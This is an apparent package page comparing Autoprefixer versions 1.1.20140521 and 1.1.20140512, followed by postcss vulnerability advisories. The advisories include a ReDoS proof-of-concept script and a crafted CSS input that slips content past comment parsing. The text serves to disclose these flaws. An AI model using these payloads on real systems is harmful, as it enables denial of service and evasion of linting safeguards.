Autoprefixer is a valuable tool for web developers, automatically adding vendor prefixes to CSS rules, ensuring broader browser compatibility based on data from the Can I Use website. Comparing versions 1.1.20140521 and 1.1.20140512 reveals incremental updates focused on development dependencies. The key difference lies in the updated versions of development tools: mocha (testing framework), stylus (CSS preprocessor), and browserify (JavaScript module bundler). Specifically, mocha jumps from 1.18.2 to 1.19.0, stylus goes from 0.45.0 to 0.45.1 and browserify goes from 4.1.2 to 4.1.5, suggesting improvements in testing capabilities, potentially bug fixes, and enhancements in module bundling efficiency.
For developers using Autoprefixer, these changes likely translate to a slightly more robust and efficient development workflow. While the core functionality of Autoprefixer remains consistent between the two versions – parsing CSS and adding vendor prefixes, the updated development dependencies make it easier to test css changes inside the plugin. Furthermore, the core dependencies, postcss and fs-extra, remain consistent, implying stability in the fundamental CSS processing and file system interactions. Therefore, upgrading to version 1.1.20140521 offers developers a refined experience with testing and bundling processes, while retaining the core benefits of automated vendor prefixing for enhanced cross-browser compatibility.
All the vulnerabilities related to the version 1.1.20140521 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.